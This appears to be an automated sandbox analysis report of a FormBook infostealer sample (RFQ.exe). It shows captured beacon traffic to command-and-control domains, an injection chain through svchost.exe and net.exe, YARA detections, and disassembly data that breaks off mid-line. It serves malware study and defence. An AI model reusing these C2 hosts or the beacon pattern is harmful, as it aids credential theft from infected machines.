                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                          Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.45004247.52.221.8802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:35.370755911 CET10739OUTPOST /9ezc/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.wukong.college
                                                                          Origin: http://www.wukong.college
                                                                          Referer: http://www.wukong.college/9ezc/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 38 76 62 48 33 32 55 78 55 6a 4c 36 6f 50 35 74 43 48 2f 31 30 69 43 4c 6c 57 4e 52 66 33 69 58 79 6d 53 34 7a 35 49 37 57 71 6e 78 6c 48 74 5a 33 76 73 36 69 30 43 5a 49 6e 52 2b 67 4a 68 56 71 39 63 53 76 51 4a 77 46 6e 47 6e 6a 69 78 71 33 75 31 79 4e 70 6b 30 77 67 6e 71 79 61 73 49 63 71 68 71 31 4a 49 37 4e 4a 67 37 33 68 61 75 52 57 66 6d 43 53 57 77 74 48 41 4c 4a 68 46 4a 6d 48 51 39 61 66 64 4f 50 62 47 62 37 6c 2b 43 63 6d 38 4c 4e 4b 57 6d 48 6e 71 61 71 49 6e 6f 56 51 70 69 2b 6f 79 69 6b 4b 32 4d 59 61 48 64 66 31 47 4e 77 43 67 74 4f 79 2f 50 67 30 6b 6c 36 55 47 67 64 39 63 67 6d 65 48 58 33 2b 4d 41 67 38 32 44 6c 48 74 69 58 32 34 33 2f 6d 6f 69 2b 59 31 43 35 6b 6c 2b 70 49 76 48 53 48 69 5a 55 69 54 2b 6d 75 5a 73 32 71 4d 52 6c 42 78 6b 46 70 6c 45 6a 39 43 50 70 2f 47 6f 73 34 44 50 73 65 37 6a 78 51 62 56 31 4a 6a 53 50 6c 71 79 33 34 69 6e 73 4a 48 6b 73 45 75 63 74 5a 48 36 46 6e 73 46 6c 73 58 51 4a 49 4d 2b 2b 59 42 65 6d 6f 73 55 7a 50 6d 2b 42 33 66 [TRUNCATED]
                                                                          Data Ascii: L2m0Zn=8vbH32UxUjL6oP5tCH/10iCLlWNRf3iXymS4z5I7WqnxlHtZ3vs6i0CZInR+gJhVq9cSvQJwFnGnjixq3u1yNpk0wgnqyasIcqhq1JI7NJg73hauRWfmCSWwtHALJhFJmHQ9afdOPbGb7l+Ccm8LNKWmHnqaqInoVQpi+oyikK2MYaHdf1GNwCgtOy/Pg0kl6UGgd9cgmeHX3+MAg82DlHtiX243/moi+Y1C5kl+pIvHSHiZUiT+muZs2qMRlBxkFplEj9CPp/Gos4DPse7jxQbV1JjSPlqy34insJHksEuctZH6FnsFlsXQJIM++YBemosUzPm+B3fe4J9WQlUdkP8SFjwHLFTYp2oZo7wiIYyNHzuOmiLVsrrdvfUoDGoRqOzcw5+U47o3C4jmN7bIbMAmjUKnkrTtQuiv0HH0a2kCD+5+X5LjA1to+omG02SemfINUa/8iUv9HosX/IrT6P1Nj2pF1Ya3PLQKAEcILjINagjBIRwr4jUMs0tRA0q0xvHv4TDk7YjWPzXenxARQmvMU5WtU5dtBAXjuB9vLkvqGB+AeiEgnTl/pgGF+gtT00y7BVgO706hNsv18i1WWzqTBbUkmS2Mg6adAxDYDNdlZRhEoe3p4EjD1AyRQvLA/kVp0+9/YvFWM6ii2U3C4oZKw0wFmEhXmlvqkvKXRQtmr3M+AWbzG9T/UGpPHm1oZAzibI9d7jFPNiYIdtrRI5KfkfUy+iL3asBnbTf+iV78rLGw57wxV3x58RNGFqnWmUfZlyRXFqxqqZkBz8Se3ra6HqLiCrAn/1te6w4sFwmnCBRwUwHL1tJH2PukcqwbZxv+i9x/B1xBLCLdwfykKznWWXvaSU8hfzNE+KIabuuY9weF3dyRpeCCvcQKzJQUpUIxVK9yygdQ7bn92wdg24pVxUOMvlRnJUxrrUi6bQInPvc2OhP62nZG2jTw1cW36nzGtEUsNDFdXDpYhtqQUBfqG5Azp3el4LjPpCRUI0n2l [TRUNCATED]
                                                                          Nov 12, 2024 08:54:36.344410896 CET390INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:36 GMT
                                                                          Server: Apache
                                                                          Vary: Accept-Encoding
                                                                          Content-Encoding: gzip
                                                                          Content-Length: 179
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00
                                                                          Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.45004347.52.221.8802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:37.918623924 CET374OUTGET /9ezc/?JPc=NBQdBBkPWTStX&L2m0Zn=xtzn0DJhGGCFi+NGW0356zy9k0R5ayLej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pe4/4DLJl/A2P/VorJYWOIYL6GivXmTWJR8= HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.wukong.college
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:54:38.899147987 CET390INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:38 GMT
                                                                          Server: Apache
                                                                          Vary: Accept-Encoding
                                                                          Content-Length: 203
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 65 7a 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /9ezc/ was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.45004423.106.59.18802060C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Nov 12, 2024 08:54:44.759210110 CET658OUTPOST /95c0/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vehiculargustav.click
                                                                          Origin: http://www.vehiculargustav.click
                                                                          Referer: http://www.vehiculargustav.click/95c0/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 35 6f 5a 52 5a 4a 74 52 67 62 58 4d 4f 76 55 72 47 31 59 43 64 37 6a 38 53 50 2b 61 51 73 71 4b 54 6a 4d 4e 70 43 32 50 48 48 6e 6a 34 4a 55 45 68 7a 41 70 78 7a 52 4e 6e 38 30 76 59 79 31 34 4b 59 35 45 2f 64 6c 48 39 64 6c 72 35 55 62 42 41 46 33 34 59 66 64 2f 6d 57 34 45 30 59 61 50 65 61 67 33 30 4d 50 78 71 49 74 56 47 34 37 5a 4e 62 45 63 68 71 54 62 47 46 69 67 68 67 6c 6d 66 6f 6c 36 2f 4c 4f 44 6f 70 32 68 32 43 2b 6f 62 41 75 37 68 45 2b 66 45 78 4f 47 67 42 35 4c 6c 2f 62 52 4a 76 36 37 42 6b 39 46 77 76 49 44 6d 30 58 56 56 68 41 6b 32 47 31 4a 73 4a 57 45 43 77 3d 3d
                                                                          Data Ascii: L2m0Zn=5oZRZJtRgbXMOvUrG1YCd7j8SP+aQsqKTjMNpC2PHHnj4JUEhzApxzRNn80vYy14KY5E/dlH9dlr5UbBAF34Yfd/mW4E0YaPeag30MPxqItVG47ZNbEchqTbGFighglmfol6/LODop2h2C+obAu7hE+fExOGgB5Ll/bRJv67Bk9FwvIDm0XVVhAk2G1JsJWECw==
                                                                          Nov 12, 2024 08:54:45.393728971 CET423INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 12 Nov 2024 07:54:42 GMT
                                                                          Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                          Content-Length: 203
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:02:51:38
                                                                          Start date:12/11/2024
                                                                          Path:C:\Users\user\Desktop\RFQ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                          Imagebase:0x680000
                                                                          File size:1'604'608 bytes
                                                                          MD5 hash:B5E39C660B2E4F19CC14B94DF9B6497C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:1
                                                                          Start time:02:51:39
                                                                          Start date:12/11/2024
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\RFQ.exe"
                                                                          Imagebase:0xed0000
                                                                          File size:46'504 bytes
                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1821270543.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1820457508.00000000003A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1820800178.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:02:51:45
                                                                          Start date:12/11/2024
                                                                          Path:C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe"
                                                                          Imagebase:0x980000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3506950733.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:3
                                                                          Start time:02:51:50
                                                                          Start date:12/11/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                          Imagebase:0xfb0000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3505942497.0000000000AF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3507077238.0000000003110000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3506196404.0000000000DA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:5
                                                                          Start time:02:52:01
                                                                          Start date:12/11/2024
                                                                          Path:C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe"
                                                                          Imagebase:0x980000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:8
                                                                          Start time:02:52:13
                                                                          Start date:12/11/2024
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x7ff6bf500000
                                                                          File size:676'768 bytes
                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:3%
                                                                            Dynamic/Decrypted Code Coverage:1.1%
                                                                            Signature Coverage:4%
                                                                            Total number of Nodes:1614
                                                                            Total number of Limit Nodes:41
                                                                            execution_graph 87027 681098 87032 68615e 87027->87032 87031 6810a7 87053 68c25d 87032->87053 87036 6861c2 87049 6861f8 87036->87049 87070 68ad22 87036->87070 87038 6861ec 87074 68562b 87038->87074 87039 68629b GetCurrentProcess IsWow64Process 87041 6862b7 87039->87041 87042 6c455b GetSystemInfo 87041->87042 87043 6862cf LoadLibraryA 87041->87043 87044 68631c GetSystemInfo 87043->87044 87045 6862e0 GetProcAddress 87043->87045 87048 6862f6 87044->87048 87045->87044 87047 6862f0 GetNativeSystemInfo 87045->87047 87046 6c4516 87047->87048 87050 6862fa FreeLibrary 87048->87050 87051 68109d 87048->87051 87049->87039 87049->87046 87050->87051 87052 6a0023 29 API calls __onexit 87051->87052 87052->87031 87078 69fd8b 87053->87078 87055 68c272 87088 69fd5b 87055->87088 87057 686175 GetVersionExW 87058 6884e7 87057->87058 87059 6c5777 87058->87059 87060 6884f7 _wcslen 87058->87060 87061 68ad22 22 API calls 87059->87061 87063 68850d 87060->87063 87064 688532 87060->87064 87062 6c5780 87061->87062 87062->87062 87113 6888bb 22 API calls 87063->87113 87066 69fd5b 22 API calls 87064->87066 87068 68853e 87066->87068 87067 688515 __fread_nolock 87067->87036 87069 69fd8b 22 API calls 87068->87069 87069->87067 87071 68ad39 __fread_nolock 87070->87071 87072 68ad30 87070->87072 87071->87038 87071->87071 87072->87071 87114 68c7c9 87072->87114 87075 685639 87074->87075 87076 68ad22 22 API calls 87075->87076 87077 68564d 87076->87077 87077->87049 87081 69fd5b 87078->87081 87080 69fd7a 87080->87055 87081->87080 87084 69fd7c 87081->87084 87098 6ae99c 87081->87098 87105 6a4e3d 7 API calls 2 library calls 87081->87105 87083 6a05ed 87107 6a3234 RaiseException 87083->87107 87084->87083 87106 6a3234 RaiseException 87084->87106 87087 6a060a 87087->87055 87091 69fd60 87088->87091 87089 6ae99c ___std_exception_copy 21 API calls 87089->87091 87090 69fd7a 87090->87057 87091->87089 87091->87090 87093 69fd7c 87091->87093 87110 6a4e3d 7 API calls 2 library calls 87091->87110 87097 6a05ed 87093->87097 87111 6a3234 RaiseException 87093->87111 87096 6a060a 87096->87057 87112 6a3234 RaiseException 87097->87112 87100 6b37b0 _abort 87098->87100 87099 6b37ee 87109 6af269 20 API calls _abort 87099->87109 87100->87099 87101 6b37d9 RtlAllocateHeap 87100->87101 87108 6a4e3d 7 API calls 2 library calls 87100->87108 87101->87100 87103 6b37ec 87101->87103 87103->87081 87105->87081 87106->87083 87107->87087 87108->87100 87109->87103 87110->87091 87111->87097 87112->87096 87113->87067 87115 68c7d9 __fread_nolock 87114->87115 87116 68c7dc 87114->87116 87115->87071 87117 69fd5b 22 API calls 87116->87117 87118 68c7e7 87117->87118 87119 69fd8b 22 API calls 87118->87119 87119->87115 87120 6d461c 87124 6f0fde 87120->87124 87122 6d4627 87123 6f0fde 53 API calls 87122->87123 87123->87122 87125 6f1018 87124->87125 87129 6f0feb 87124->87129 87125->87122 87126 6f101a 87168 69f9a5 53 API calls 87126->87168 87127 6f101f 87135 688e90 87127->87135 87129->87125 87129->87126 87129->87127 87133 6f1012 87129->87133 87167 68cb70 39 API calls 87133->87167 87136 688ea5 87135->87136 87153 688ea2 87135->87153 87137 688edb 87136->87137 87138 688ead 87136->87138 87139 6c5ccc 87137->87139 87141 688eed 87137->87141 87142 6c5be5 87137->87142 87169 6a5156 26 API calls 87138->87169 87178 6a5113 26 API calls 87139->87178 87176 69faa3 51 API calls 87141->87176 87149 6c5c5e 87142->87149 87152 69fd8b 22 API calls 87142->87152 87143 688ebd 87148 69fd5b 22 API calls 87143->87148 87146 6c5ce4 87146->87146 87150 688ec7 87148->87150 87177 69faa3 51 API calls 87149->87177 87170 68b606 87150->87170 87154 6c5c2e 87152->87154 87158 687cf8 87153->87158 87155 69fd5b 22 API calls 87154->87155 87156 6c5c55 87155->87156 87157 68b606 22 API calls 87156->87157 87157->87149 87159 6c563c 87158->87159 87160 687d0a 87158->87160 87189 6e09c0 22 API calls __fread_nolock 87159->87189 87179 687d1b 87160->87179 87163 687d16 87163->87125 87164 6c5646 87166 6c5652 87164->87166 87190 68c1c3 87164->87190 87167->87125 87168->87127 87169->87143 87171 68b615 _wcslen 87170->87171 87172 69fd8b 22 API calls 87171->87172 87173 68b63d __fread_nolock 87172->87173 87174 69fd5b 22 API calls 87173->87174 87175 68b653 87174->87175 87175->87153 87176->87143 87177->87139 87178->87146 87180 687d5e __fread_nolock 87179->87180 87181 687d2a 87179->87181 87180->87163 87181->87180 87182 687d51 87181->87182 87183 6c566d 87181->87183 87194 68be83 87182->87194 87184 69fd5b 22 API calls 87183->87184 87186 6c567c 87184->87186 87187 69fd8b 22 API calls 87186->87187 87188 6c56b0 __fread_nolock 87187->87188 87189->87164 87191 68c1e6 __fread_nolock 87190->87191 87192 68c1d7 87190->87192 87191->87166 87192->87191 87193 69fd8b 22 API calls 87192->87193 87193->87191 87195 68be99 87194->87195 87198 68be94 __fread_nolock 87194->87198 87196 69fd8b 22 API calls 87195->87196 87197 6d03ea 87195->87197 87196->87198 87197->87197 87198->87180 87199 6a037b 87200 6a0387 ___BuildCatchObject 87199->87200 87229 69fe31 87200->87229 87202 6a038e 87203 6a04e1 87202->87203 87206 6a03b8 87202->87206 87267 6a07bf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 87203->87267 87205 6a04e8 87268 6a4de2 28 API calls _abort 87205->87268 87218 6a03f7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 87206->87218 87240 6b240d 87206->87240 87208 6a04ee 87269 6a4d94 28 API calls _abort 87208->87269 87212 6a04f6 87213 6a03d7 87215 6a0458 87248 6a08d9 87215->87248 87217 6a045e 87252 68368b 87217->87252 87218->87215 87263 6a4daa 38 API calls 2 library calls 87218->87263 87223 6a047a 87223->87205 87224 6a047e 87223->87224 87225 6a0487 87224->87225 87265 6a4d85 28 API calls _abort 87224->87265 87266 69ffc0 13 API calls 2 library calls 87225->87266 87228 6a048f 87228->87213 87230 69fe3a 87229->87230 87270 6a0618 IsProcessorFeaturePresent 87230->87270 87232 69fe46 87271 6a2c24 10 API calls 3 library calls 87232->87271 87234 69fe4f 87234->87202 87235 69fe4b 87235->87234 87272 6b22a7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87235->87272 87237 69fe58 87238 69fe66 87237->87238 87273 6a2c4d 8 API calls 3 library calls 87237->87273 87238->87202 87241 6b2424 87240->87241 87274 6a0a0c 87241->87274 87243 6a03d1 87243->87213 87244 6b23b1 87243->87244 87245 6b23e0 87244->87245 87246 6a0a0c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 87245->87246 87247 6b2409 87246->87247 87247->87218 87282 6a22d0 87248->87282 87251 6a08ff 87251->87217 87253 683697 IsThemeActive 87252->87253 87254 6836f2 87252->87254 87284 6a4ed3 87253->87284 87264 6a0912 GetModuleHandleW 87254->87264 87256 6836c2 87290 6a4f39 87256->87290 87258 6836c9 87297 683656 SystemParametersInfoW SystemParametersInfoW 87258->87297 87260 6836d0 87298 68445d 87260->87298 87262 6836d8 SystemParametersInfoW 87262->87254 87263->87215 87264->87223 87265->87225 87266->87228 87267->87205 87268->87208 87269->87212 87270->87232 87271->87235 87272->87237 87273->87234 87275 6a0a17 IsProcessorFeaturePresent 87274->87275 87276 6a0a15 87274->87276 87278 6a0bdd 87275->87278 87276->87243 87281 6a0ba1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 87278->87281 87280 6a0cc0 87280->87243 87281->87280 87283 6a08ec GetStartupInfoW 87282->87283 87283->87251 87285 6a4edf ___BuildCatchObject 87284->87285 87347 6b2eee EnterCriticalSection 87285->87347 87287 6a4eea pre_c_initialization 87348 6a4f2a 87287->87348 87289 6a4f1f __wsopen_s 87289->87256 87291 6a4f5f 87290->87291 87292 6a4f45 87290->87292 87291->87258 87292->87291 87352 6af269 20 API calls _abort 87292->87352 87294 6a4f4f 87353 6b277c 26 API calls pre_c_initialization 87294->87353 87296 6a4f5a 87296->87258 87297->87260 87299 68446d __wsopen_s 87298->87299 87300 68c25d 22 API calls 87299->87300 87301 684479 GetCurrentDirectoryW 87300->87301 87354 684862 87301->87354 87303 6844a0 IsDebuggerPresent 87304 6c370f MessageBoxA 87303->87304 87305 6844ae 87303->87305 87306 6c3727 87304->87306 87305->87306 87307 6844cb 87305->87307 87480 688f2c 22 API calls 87306->87480 87433 68480e 87307->87433 87310 68453d 87316 6c3764 SetCurrentDirectoryW 87310->87316 87317 684545 87310->87317 87312 6844ea GetFullPathNameW 87313 6884e7 22 API calls 87312->87313 87314 684529 87313->87314 87449 6836fb 87314->87449 87316->87317 87318 684550 87317->87318 87481 6e15a7 AllocateAndInitializeSid CheckTokenMembership FreeSid 87317->87481 87465 6845ae 7 API calls 87318->87465 87321 6c377f 87321->87318 87324 6c3791 87321->87324 87482 6858e5 87324->87482 87325 68455a 87332 68456f 87325->87332 87469 6856c2 87325->87469 87327 6c379a 87329 68b606 22 API calls 87327->87329 87330 6c37a8 87329->87330 87333 6c37d7 87330->87333 87334 6c37b0 87330->87334 87331 68458a 87338 684591 SetCurrentDirectoryW 87331->87338 87332->87331 87479 684b1d Shell_NotifyIconW ___scrt_fastfail 87332->87479 87336 6852b7 22 API calls 87333->87336 87489 6852b7 87334->87489 87340 6c37d3 GetForegroundWindow ShellExecuteW 87336->87340 87339 6845a5 87338->87339 87339->87262 87344 6c3808 87340->87344 87343 687cf8 22 API calls 87345 6c37c9 87343->87345 87344->87331 87346 6852b7 22 API calls 87345->87346 87346->87340 87347->87287 87351 6b2f36 LeaveCriticalSection 87348->87351 87350 6a4f31 87350->87289 87351->87350 87352->87294 87353->87296 87355 68c25d 22 API calls 87354->87355 87356 684878 87355->87356 87498 686485 87356->87498 87358 684896 87359 6858e5 24 API calls 87358->87359 87360 6848aa 87359->87360 87361 68b606 22 API calls 87360->87361 87362 6848b7 87361->87362 87512 68686d 87362->87512 87365 6848d8 87369 68c1c3 22 API calls 87365->87369 87366 6c3892 87579 6f2c17 87366->87579 87368 6c38a5 87370 6c38b1 87368->87370 87605 6868db 87368->87605 87371 6848ee 87369->87371 87374 6868db 68 API calls 87370->87374 87534 68890f 87371->87534 87376 6c38c7 87374->87376 87380 684aaf 22 API calls 87376->87380 87377 68b606 22 API calls 87378 684907 87377->87378 87537 68c117 87378->87537 87382 6c38e4 87380->87382 87381 684917 87383 68b606 22 API calls 87381->87383 87385 